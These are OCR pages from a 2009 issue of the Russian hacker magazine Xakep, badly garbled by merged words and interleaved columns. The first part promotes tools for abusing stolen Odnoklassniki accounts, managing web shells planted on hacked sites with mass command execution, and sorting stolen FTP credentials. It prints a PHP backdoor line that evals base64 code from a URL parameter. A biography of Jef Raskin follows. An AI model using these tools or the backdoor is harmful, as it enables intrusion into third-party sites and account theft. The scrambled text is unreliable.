анеPHP/перл-скриптом, какиханалоги. Благо- |
|
|
|
|
|
|
|
|
|
|
ветствует правилам в социальной сети) |
даримавтора— Zdez Bil Ya — исливаемпрогис |
|
|
|
|
|
|
|
|
|
|
• аккаунт заблокирован |
нашегодиска:). |
|
|
|
|
|
|
|
|
|
|
Кактыпонимаешь, передзапускомченджера |
ПРОГРАММА:SHELLMANAGER |
|
|
|
|
|
|
|
|
|
|
пассовжелательнопрочекатьсписокаккаунтов |
ОС:*NIX/WIN |
|
|
|
|
|
|
|
|
|
|
навалид. Дляэтогомызаюзаемвторуюутилу— |
АВТОР: KRIST_ALL |
|
|
|
|
|
|
|
|
|
|
чекеракковдля«Одноклассников»: |
Ежедневно, ломаятотилиинойресурс, мыпопол- |
|
|
|
|
|
|
|
|
||
|
няемсвоюколлекциюweb-шеллов. Незнаю, как |
|
|
|
|
|
|
|
|
|
|
• Все аккаунты должны храниться в |
утебя, ноуменявзакладкахнасчитываетсяболее |
|
|
|
|
|
|
|
|
||
файле accounts.txt, вид записей: |
сотнисоответствующихлинков, иэтодалеконе |
|
|
|
|
|
|
|
|
|
|
логин;пароль. |
предел:). Возникаетвполнелогичныйвопрос: |
|
|
|
|
|
|
|
|
|
|
• В процессе работы утила использует |
каксортироватьичекатьнавалидвесьархив |
|
|
|
|
|
|
|
|
|
|
несколько файлов: |
шеллов? ДляэтойцелитоварищемKrist_ALL'ом |
|
|
|
|
|
|
|
|
|
|
good_acc.txt — файл, в который поме- |
быланаписананебольшаяутилаподназванием |
|
|
|
|
|
|
|
|
|
|
щаются все валидные аккаунты |
«Shell manager», позволяющаяпарситьвеб- |
|
|
|
|
|
|
|
|
|
|
block_acc.txt — файл, в который поме- |
шеллыпотвоемуусмотрению. Тулзапредстав- |
|
|
|
|
|
|
|
|
|
|
щаются все заблокированные аккаунты, |
ляетсобойпхп-скрипт, обладающийтакими |
|
|
|
|
|
|
|
|
|
|
доступ к которым закрыт из-за частых |
функциями, как: |
|
|
|
|
|
|
|
|
|
|
попыток логина |
|
|
|
|
|
|
|
|
|
|
|
bad_acc.txt — файл, в который помеща- |
• Проверка веб-шеллов на валидность |
|
|
|
|
|
|
|
|
|
|
064 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
>> взломw Click |
|
BUY |
|
|
|||||||||||
w Click |
to |
|
|
|
|
|
m |
to |
|
|
|
|
|
m |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
Управляемвеб-шеллами
•Чекинг веб-шеллов с последующим определением PR/ТИЦ/Alexa_Rank
•Возможность ведения заметок по каждому веб-шеллу
•Массовое выполнение команд (отме- чаем веб-шеллы, вводим команду и наблюдаем результат выполнения отдельно для каждого веб-шелла)
•Добавление веб-шеллов из списка
•Возможность экспорта результатов
•Наличие авторизации
Использоватьскриптдовольнопросто:
1.Запускаем скрипт, указав пароль (по дефолту: password)
2.Создаем необходимую таблицу в БД
3.Редактируем файл скрипта, изменив значение переменной $install на 1 и внеся данные о БД:
//----Настройка БД----------------
$db_host = ''; // Хост $db_login = ''; // Пароль $db_password = ''; // Пароль
$db_name = ''; // Имя базы данных //----Настройка Shell Mananger----
$use_auth = 1; // 1 — Использовать авторизацию, 0 — не использовать $install = 1; //заменить на 1, после создание таблицы
$password = 'password'; //Изменить на свой.
4.Чтобыдобавленныйвеб-шеллчекался— необходимовегокоддобавитьпарустрок:
if(isset($_GET['m'])) {echo 1; exit;} elseif(isset($_GET['ev'])) { $sss =base64_decode($_GET['ev']); eval($sss); exit; }
5. Все, теперьчекербудетуспешновзаимодейст- воватьсдобавленнымвеб-шеллом.
ПРОГРАММА:FTPPARSER ОС:*NIX/WIN
АВТОР: [QWYZ]
Присборефтп-акковкаждыйразвстаетодинитот жевопрос:каклучшевсегоихотпарсить?Причем, речьидетнетолькоопроверкевалидности,но иовсевозможныхсортировкахдоменов.Итак, представляютебеутилуподнезамысловатым названием«FTPParser»,способнуюотпарсить списокфтп-учетокпосамымразнообразным
критериям.ТулзапредставляетсобойPHP-скрипт весомв3Кбисредиеехарактеристик:
Парсимфтп-листы
•Поиск красивых доменов среди базы фтп-акков (например, blabla.com)
•Возможность указания максимальной длины домена
•Возможность поиска определенных слов среди доменных имен
•Возможность осуществления поиска в субдоменах
•Функция сохранения результатов сортировки
•Автоматическая подсветка доменов, аккаунтов и искомых фраз в тексте
•Возможность соединения с любым фтпсервером из списка после обработки запроса
Чтобызаюзатьскрипт, следуетзадатьемунесколькообязательныхпараметров, такихкак:
$z = доменная зона (например, &z=com), если ограничений нет, то * (например, &z=*)
$m = максимальная длина домена (например, &m=14), если ограничений нет, то * (например, &m=*)
$base = файл с фтп-акками, который располагается в каталоге ./bases (например, &base=file.txt)
$all = включить поиск среди субдоменов (например, &all=1,&all=0) $save = включить функцию сохранения результатов запроса (используется каталог ./querie), например, &save=yes,&save=no
$word = поиск определенных слов в доменных именах (например, &word=blabla)
Тоесть, послетого, кактызалилскриптнасервер, атакжесоздалдвакаталога— ./bases (сфтплистомвнутри) и./queries, тебенадоперейтипо следующемулинку:
http://òâîé_õîñò/parser. php?z=com&m=14&base=ftps.txt&all=0&s ave=yes&word=freehostia.com
Кактыужепонял, значенияпеременныхвзапросенапрямуюзависятоттебя.
ПРОГРАММА:SYMVPN
ОС:SYMBIAN АВТОР: TELEXY.COM
Еслиутебяестьболее-менеефункциональный мобильник, топроблемабезопасноговеб-сер- фингатебезнакома. Подразличныемобильные платформысоксификаторынесыщешьднем
XÀÊÅÐ 08 /128/ 09
НастройкаSymVPN
согнем, неговоряужепрополноценныйVPN. ОднакоеслитыявляешьсясчастливымобладателемдевайсанабазеSymbian OS 3rd, считай, что тебеповезло. НетакдавнодляэтойОСпоявился функциональныйVPN-софтподназванием SymVPN, поддерживающийпротоколPPTP с шифрованием128-битнымключомMPPE. Найти утилутысможешьнапорталеwww.telexy.com, которыйпринадлежитразработчикамвсевозможногополезногософтаподSymbian OS. Здесьтебе иSymRDP (Symbian Remote Desktop Connection Client), и SymNC (Network Commander) имного чегоеще. Правда, весьсофтплатный, нодляжи- телейx-USSR действуетскидкав40% (telexy.com/ Support/Publications.aspx?codeid=WGSBI6X6KV),
чтонетакужиплохо. Насамомпорталетыможешьслитьтриальнуюверсиюутилыивтечение 14 днейоценитьвсееепреимущества. Нуипосле оценкиподостоинству, разумеется, купитьза какие-тожалкие820 рублей:).
Дляинсталляциипотребуетсяпройтипроцедуру регистрациииуказатьвсенеобходимыеданные (email, imei твоейтрубы). Этообязательно, ибо копияполученнойтобойтулзыпривязывается кIMEI-номерутелефона. Такилииначе, после получениялинканасофтследуетперейтикее настройке, аименно:
1.Устанавливаем
2.Ребутим мобилку
3.Запускаем утилу, указываем параметры соединения, точку доступа (GPRS/Wi-Fi), IP-сервера, логин с паролем и имя точки доступа, которая будет ассоциироваться с VPN-каналом
4.Выбираем пункт меню «Проверить». Если все в порядке — софтинка выдаст сетевые реквизиты, которые должны быть получены под VPN (IP/маска/шлюз/ DNS)
5.Запускаем стороннюю программу (можно при вырубленном SymVPN) и при запросе точки доступа лицезрим свежесозданную виртуальную точку. Недолго думая, выбираем ее, и весь трафик послушно форварднется на VPN-туннель
Наданныймоментсофтинаадаптированапрак- тическиподвсеюзабельныеSymbiain-приложе- нияиработаетсбольшинствомизвестныхVPNсервисов. Такчтотольколенивыйнеспособен скачать, установитьипостоянноиспользоватьэту прекраснуюутилу.z
065
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
>>m |
|
||||
w Click |
to |
|
|
|
|
сцена |
|||||
|
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
1)ДжефРаскинсмакетомCanon Cat
2) СовсемещемолодойРаскин(70-егоды) 3)Новенькие«Кошки» 4) КусочекмастерскойДжефа
МАРИЯ «MIFRILL» НЕФЕДОВА
/ MIFRILL@REAL.XAKEP.RU /
ИНТЕРФЕЙСЫ ПОДДРУГИМ 1 УГЛОМ
ЖизньиисследованияДжефаРаскина
ИсторияIT знаетнемалопримеров«непризнанныхгениев». Наиболееярко этоподтверждаюттакиеличности, какАланТьюринг, илиДугласЭнгельбарт, человекпридумавший«мышь», нонезаработавшийнаэтомпочтиничего.
Унашегосегодняшнегогерояслучай, вцелом, похожий. ДжефРаскинизвестен вовсеммирекаксоздательApple Macintosh, нонемногиезнают, чтоонтакже положилполжизнинаборьбуснесовершенствомпользовательскихинтерфейсов, авприснопамятномApple непродержалсядажедорелиза«Макинтоша».
ЗАБЫВЧИВАЯ |
поджелудочнойжелезы, который |
причина, покоторойпрессапред- |
чтородилсяон23 марта1943, |
ПРЕССА |
емудиагностироваливсегогодом |
почла«забыть» одругихзаслугах |
несложноподсчитать, чтоктому |
Итак, речьпойдетопрофессоре |
ранее. |
иисследованияхДжефаРаскина. |
времениДжефуженебылвыпуск- |
ДжефеРаскине, ипередтемкак |
ПослесмертиРаскинаСМИвсего |
Ведь, «Мак», посути, былдлянего |
никомвуза, сгорящимиглазами |
перейтикповествованию, хотелось |
мира, последнеевремянеочень-то |
лишьоднойизмногихвех. Сегодня |
рвущимсяизменятьмир. Более |
быотметить, чтониздесь, нипосле |
баловавшиепрофессорасвоим |
мыпопробуемпосмотретьна |
того— хотякомпьютерыивысокие |
явовсенепытаюсьназыватьего |
вниманием, буквальновзорвались |
Джефанетолькокакна«создателя |
технологииинтересовалиего |
напанибратскийманер. Делов |
заголовкамивдухе: «Умер«отец» |
Макинтоша». |
практическивсюжизнь, Раскин |
том, чтоДжеф(Jef) — этополноеи |
Макинтоша». Инельзясказать, что, |
САМОЛЕТЫ, |
никогданеограничивалсятолько |
довольноредкоеимя, аотнюдьне |
награждаяДжефаэтимтитулом, |
ими, лишнийразподтверждая, что |
|
уменьшительное, какможнобыло |
онипогрешилипротивправды. |
МУЗЫКАИСПОРТ |
«талантливыйчеловек, талантлив |
быподумать. |
Хотя, конечно, надсозданием |
Чтобыобъяснить, почемуработа |
вомногом». Досвоегоприхода |
РассказыватьисториюРаскина |
«Мака» трудиласьцелаягруппа |
вApple отнюдьнебылаглавным |
вApple Раскинуспелнетолько |
можнопо-разному, ужоченьнеор- |
специалистов(надеюсь, средина- |
достижениемвжизниРаскина, |
получитьобразованиеипопро- |
динарнойонбылличностью, ноя, |
шихчитателейнетлюдей, которые |
достаточнорассказать, чемон |
боватьсебявсамыхразныхоб- |
пожалуй, начнуеесконца. |
досихпорсвятоверятвто, чтовсе |
занималсядоэтого. Всовсемеще |
ластях. Кромеэтого, он, очевидно, |
ДжефРаскинушелизжизни |
«яблочные» продукты— делорук |
молодуюкомпаниюApple Раскин |
понял, чтопредпочитаетработать |
26-гофевраля2005, ввозрасте61 |
исключительноСтиваДжобса?). |
пришелв1978 году, ставвсего |
насебя, иобзавелсясобственным |
года. Причинойсмертисталрак |
Однаконесовсемпонятнодругое— |
31-меесотрудником. Учитывая, |
делом. ИпустьбизнесуДжефа |
066 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2
3
>>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
сценаw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
4
былвесьмаскромный, никаких |
Чегожездесьудивительного, |
ДжефРаскинуспевалувлекаться |
идей. Ужетогдаонхотелсоздать |
тебекорпорацийимега-успеха, — |
спросишьты? А«Западныйве- |
икомпьютерами, тожепрофесси- |
компьютер, ориентированныйна |
онбылвесьманетривиален. Как |
тер», междупрочим, сталпервой |
онально. Ещев1964-1965 годахон |
нуждыпростыхлюдей, неразбира- |
тыуже, наверняка, догадался, сIT |
вмиресерийнойавиамоделью, |
окончилУниверситетштатаНью- |
ющихсявовсехэтихпремудростях, |
делоРаскинабыласвязанолишь |
разработаннойтакимобразом. |
Йорк, получивсначаластепень |
недорогойипонятныйагрегатдля |
косвенно. |
Ноеслитырешил, чтодоApple |
бакалавравобластиматематики, а |
«человекасулицы». Интересно, |
Джефнапротяжениивсейжизни |
Джефзанималсяисключительно |
затемивобластифилософии. Чуть |
чтоанналыинтернетасохранилии |
оставалсязаядлыммоделистом— |
игрушечнымисамолетиками(да |
позже(1967) кэтомудобавилась |
донеслидонашихднейтотсамый |
миниатюрныесамолетыбылиего |
простятменяавиамоделисты), |
степеньмагистравобластивычис- |
документ, вкоторомДжефизлагал |
настоящейстрастью. Такчтоодна |
спешузаверить— этонетак! |
лительнойтехники, полученная |
своюидею, представляяеенасуд |
изегофирмзанималасьпроиз- |
Кромедел, связанныхсавиамо- |
РаскинымвУниверситетештата |
начальства. |
водствомнаборов«сделайсам» для |
делированием, уДжефаимелась |
Пенсильвания. Такчто, в70-еДжеф |
Верхушкакомпании, прямоскажем, |
авиамоделистов, идляДжефаэто |
исвояконсалтинговаяфирма, где, |
ужеимелсложившиесяиподкреп- |
этоймысльюнеочень-тозагоре- |
былнепростобизнес: самолетики |
помимоконсультационнойде- |
ленныезнаниемделавзглядына |
лась, ноодобрениеРаскинувсеже |
оннетолькопродавал, ноисамосто- |
ятельности, онкорпелнаднаписа- |
развитиекомпьютернойтехники, |
далииминимальнуюподдержку |
ятельнопроектировал. |
ниеммануаловкразнымдевайсам |
иужетогдавынашивалрядидей, |
обеспечили. Темнеменее, напер- |
Сэтим, кстати, связанодинин- |
(вчислекоторыхбылApple II). |
идущихнемноговразрезскурсом |
выхпарахДжеф, посути, работал |
тересныйфакт. Ещев70-хгодах |
Плюс, Раскинпрофессиональноза- |
прогресса. |
один. Ондалпроектуимя, окрестив |
Раскинпридумаливоплотил |
нималсярекламнойфотографией |
Думаю, теперьвопросовотом, как |
его«Макинтош» (Macintosh) вчесть |
вжизньуправляемыйпланер |
иимелмузыкальноеобразование, |
ипочемуРаскинпопалвApple |
своеголюбимогосортаяблок, с |
Western Wind («ЗападныйВе- |
подтвержденноепрактикой— ему |
возникнутьнедолжно, особенно |
намеренной«ошибкой» вназвании |
тер»), ставшийсредиценителей |
довелосьдирижироватьНью-йорк- |
учитывая, что«яблочнаякомпа- |
— чтобыневозниклопроблемс |
популярноймоделью. Нонам |
скимфилармоническиморкестром |
ния» ужеимеласДжефомдело, до |
производителямирадиоаппара- |
интересеннесамсамолет, ато, |
исимфоническиморкестромСан- |
егопоступлениякнимнаработу. |
турыMcIntosh, изанялсяделом. |
чтоРаскинобладалудивительным |
Франциско. Самособой, этопод- |
APPLE, «МАКИН- |
Постепеннокегоразработке- |
качеством— любыезадачион |
разумевает, чтоДжефвеликолепно |
исследованиюподключилисьи |
|
всегдарешалсовершеннонестан- |
игралнацеломрядемузыкальных |
ТОШ» ИСТИВЕН |
другиесотрудники, вихчислебыл |
дартнымиметодами, привносяв |
инструментов(вихчисленетолько |
ДЖОБС |
бывшийстудентРаскина— Билл |
ужесложившиесяиотработанные |
фортепианоиударные, ноиальт- |
Какужебылосказано, отрицать |
Аткинсон, атакжесамСтивен |
процессычто-тоабсолютноновое |
рекордеридажеорган). Надосуге |
вкладРаскинавсоздание«Мака» |
Возняк. Однако«Макинтош» |
ипереворачиваяпривычноес |
онсамписалмузыку. |
бесполезно, равнокакинедооце- |
по-прежнемуоставалсянавторых |
ногнаголову. Вотидляпроекти- |
Такженашгеройбылвотличных |
ниватьегозначимость. Пришло |
ролях, ималоктовоспринималего |
ровкиWestern Wind Джефрешил |
отношенияхсоспортом— прекрас- |
времявернутьсяк«ябблочкам». |
всерьез, ведьуApple тогдаимелись |
воспользоватьсяпоследними |
нострелялизлукаиобожалезду |
КогдаРаскинтолькопришелв |
иболееамбициозныеиинтересные |
достижениямипрогресса(на |
навелосипеде, которойнекоторое |
Apple, егосразужепопытались |
проекты. |
дворенапомню, начало70-х) и |
времязанималсявполнепро- |
приставитькработенадпри- |
Например, «ВеликийиУжасный» |
прибегкпомощикомпьютера, |
фессионально, например, обучая |
ставкойAnnie, чтоневызвалоу |
СтивенДжобсбылпоглощенразра- |
самостоятельнонаписавнужный |
этомустудентовКалифорнийского |
Джефаникакоговосторга. Чтобы |
боткойдорогостоящейимощной |
софт. Сегопомощьюбыласоздана |
университетанакафедрефиз. |
нетратитьсвоевремянанеинте- |
Apple Lisa, котораяскорееявлялась |
трехмернаямодельсамолетаи |
подготовки. |
ресноеемузанятие, Раскинсделал |
рабочейстанцией, чемдомашним |
развертки, необходимыедляпос- |
И, какнипарадоксально, притаком |
ходконемивысказалруководству |
ПК. Идеяпростогоинедорогого |
ледующейсборкимоделивреале. |
количествехоббиилюбимыхдел |
компанииоднуизсобственных |
«Мака» Джобсу, грезящемуосу- |
XÀÊÅÐ 08 /128/ 09 |
067 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
>>m |
|
||||
w Click |
to |
|
|
|
|
сцена |
|||||
|
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
1
пер-мощныхмашинах, разумеется, совершенноненравилась. Согласно воспоминаниямРаскина, Стивпостояннотвердил, что«изэтого[проекта «Макинтош»] ничегоневыйдет, иэтоникогданебудетработать», атакже постоянновставлялпалкивколеса. Втом, чтоРаскинуиДжобсуне удавалосьнайтиобщийязык, нетничегоудивительногоещеипотому, что Джобсратовалзанеслыханныевтегодыиспользование«мыши» иGUI (которымикакразидолжнабылаобладать«Лиза»), аРаскинсбольшим скепсисомсмотрелнаэти«гениальныеизобретения». Нонеизвестно, как бывсеобернулосьвитоге, еслибысовсемскороДжобсанеотстранили отдолжностируководителяпроектаLisa. Причинойбыл полныйпровал мощныхидорогостоящихApple III, которымитожезанималсяСтив. Компьютерыоказалисьнетолькослишкомдорогимииневостребованными(шуткали, Apple III стоили$5000-8000), ониктомужегорелидесятками! Последнеепроисходило«благодаря» сумасшедшиммощностямApple III
ивесьмаоригинальнымнюансампроектировки— порешениювсетого жеДжобсаизкорпуса, компактностиради, пришлосьвыкинутьпочтивсе вентиляторы. Apple Lisa, всвоюочередь, определеннособираласьпойти постопамApple III, чтонемоглонеобеспокоитьруководство. Какпокажет время, опасениябыливерны, идажеотстранениеДжобсанеспасло проектотфиаско.
СидетьбезделаобиженныйнавсехДжобс, конечно, нестал. Оставшисьзабортом«Лизы», онпереключилвсесвоевнимание на«Макинтош», внезапноувидеввисследованияхРаскинамного интересногоимногообещающего. Плюс, онтвердорешил, что переплюнетготовящуюсяквыходуLisa повсемпунктам, иразногласиймеждунимиРаскиныммоментальносталоещебольше. Джобс поручилРаскинуичастикомандыработунадПО, асамвзялсязажелезо, врезультатечего«Мак» моментальноначалобрастатьчертами «Лизы», что, самособой, совершеннонепонравилосьДжефу. Кстати, обликомapple-мышьвомногомобязанаименноРаскину. Будучивынужденмиритьсясприсутствием«крысы» всвоемпроекте, онрешил немногопеределатьеенасвойлад. Избавилсяотлишних, поего мнению, кнопок, иподсмотренныйукомпанииXerox трехкнопочный грызунсталоднокнопочным.
ПриходДжобса, конечно, имелиположительныестороны. Онсумел добитьсядолжногофинансирования, привлеккразработкенесколько десятковчеловек, и«Мак» наглазахпревратилсяводинизтоповых проектовкомпании, которымзанималасьэлита. Однакочембольше крепловлияниеДжобса, темнеуютнеечувствовалсебяРаскин— егоидеюизвратилиужепочтидонеузнаваемости. Дошлодотого, чтоДжобсдажепыталсяпереименоватьпроект, заменивкодовое Macintosh наBicycle, тоесть«велосипед». Какнитруднодогадаться, изэтогоничегоневышло, нонужносказать, чтоСтивдействительно старался— сотрудникам, которыепродолжалипользоватьсястарым названием, грозиливыговоры. Амаркетологи, ккоторымобратились ближекрелизу, лишькаким-точудомнесумелипридуматьничего лучше«Макинтоша».
Когдав1982 годуДжобс, наконец, окончательноперетянулодеялонасебя
ивозглавилразработкуПОдля«Макинтоша», потеснивДжефаиздесь,
Раскинневыдержал. Безучастнонаблюдатьзавсемэтимоннемог, а
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
|
X |
|
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
|||
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|
|||||
|
w |
|
|
|
|
|
|
|
|
|
|
|
1)«Кошка» отCanon |
|
w |
p |
|
|
|
|
g |
|
o |
|
|
|
|
|
|
|
|
.c |
|
|||||
|
|
. |
|
|
|
|
|
|
|
|||
|
|
|
|
df |
|
|
n |
e |
|
|||
2) Apple Macintosh |
|
|
|
|
-x cha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
сдвинутьСтивенаснамеченногокурсанепредставлялосьвозможным (хотяон, разумеется, пытался— баталииразворачивалисьнешуточные). В итоге, Джефпредпочелуволиться. ВApple нехотелитерятьценныекадры идажепредлагалиРаскинувозглавитьновоеисследовательскоеподразделениекомпании, однаконауговорыоннеподдался.
«КОШКА» ИПОЛЬЗОВАТЕЛЬСКИЕ ИНТЕРФЕЙСЫ
Каковабыладальнейшаясудьба«Макинтоша» — прекрасноизвестно, болеетого— обэтомнаписананеоднакнига, такчтонестанемсверх нужногоуглублятьсявисториюApple.
ПослеувольненияДжефРаскинвовсенедумалотчаиваться. Напротив, покинувApple, онпочтисразупереключилсянаразработкунеменее интересноймашины. ОсновавфирмуInformation Appliance, онзанялсяреализациейтехидей, чтобезжалостновыкинулиизпроекта«Макинтош». ПервымпродуктомInformation Appliance сталакартарасширениядля Apple II — SwyftCard, содержавшаяпрограммныйпакетSwyftWare. Ивот здесь-томывплотнуюподошликключевомумоменту— квзглядамДжефа Раскинанапользовательскиеинтерфейсыитому, чтоизэтогополучилось.
Нашгеройбылуверен, чтопрактическивсесуществующиепользовательскиеинтерфейсы— этосамоенастоящеезло. Естьюзериесть данные, авсеостальное— отлукавого. Идеяприложений, помнению Раскина, удобнаразвечтосамимпрограммерам, ноникакнеконечному пользователю, которыйвынужденсовсемэтимобщаться, запоминая совершенноразныекоманды, принципыработыипрочиеособенности. Объясняясвоюточкузрения, Джефнередкопроводилпараллелисфизическимивозможностямичеловека. Работаяснеудобнойилинеграмотно спроектированноймашиной(например, тренажером), человекощущает дискомфортипонимает, чтоемутяжелоинеудобно. Ментальныевозможностиограниченыточнотакже, какивозможностифизические, ноужасв том, что, работаяснеправильноспроектированныминтерфейсом, пользовательнеосознаетинечувствуетнеудобства. Затоконцентрациявниманияипроизводительностьстремительнопадают— мозгзачастуюпросто неуспеваетреагироватьиобрабатыватьтакоеколичествоинформации. ОбэтойболеечемсерьезнойпроблемеРаскинзадумалсяоднимизпервых. Нокакзаставитьразработчиковперестатьломатьюзераммозг? РешениепроблемыДжефвиделдовольноспецифическое. Онпредлагал отказатьсяоткучиразномастныхприложений(азаодноиотGUI вообще), воюющихзавниманиепользователяипорождающиххаос, — исоздать единуюрабочуюсреду, котораявсегдаведетсебяодинаково, отвечает наодниитежесочетанияклавишикоманды. Раскинсчиталнужным упразднитьи«мышь». Врезультатесуммированиявсегоэтогонасвети появитсяSWYFT.
GUI уSWYFT’анебыло, онработалтолькостекстом, являясобойтекстовыймонолит, гдефайлыотделялисьдруготдругалишьспециальным символом-разделителем. Посути, файловаясистематожеотсутствовала. Точнотакжеубралиикомандусохранения, вSWYFT онабыланенужна
— состояниесистемысэйвилосьнадискетусамо, померенадобности, избавляяпользователяотлишнейголовнойболи. Интересно, чтопри выключенииипоследующемвключениикомпьютера, системапервым деломвосстанавливала«момент», накоторомостановилась, ивыводила егонаэкран. Из-заэтоговозникаловпечатление, будтоSWYFT грузится моментально, июзермогсразуначинатьработу, вместотогочтобысидеть, тупоуставившисьнанадпись«Загрузка».
НавигацияпотекстовомумассивуосуществляласьспомощьюмеханизмаLEAP («прыжок»), — этопрактическианалогнынешнегопоиска, например, вFirefox, иблизкийродственникпривычногодлянас<Ctrl+F>. Чтобыперейтикопределенномудокументу, достаточнобыло, удерживая LEAP-клавишу, набратьсимвол«разделитель» иначатьвбиватьназвание нужногодокумента. Например, еслибыдокументназывался«Хакер», топо меренабораLEAP перебросилбытебясначалакближайшемудокументу на«х», потомна«ха», «хак» ит.д. Витоге, тывлюбомслучаедобралсябы доискомого, притомдовольнобыстро.
Такжевтекстможнобылодобавлятьсобственныепометкидляупрощения навигации. Тоесть, обозначивважныевещи, ккоторымнуженбыстрый доступ, какой-тофразой, символом, илинаборомбукввроде«QWERTY», ты
XÀÊÅÐ 08 /128/ 09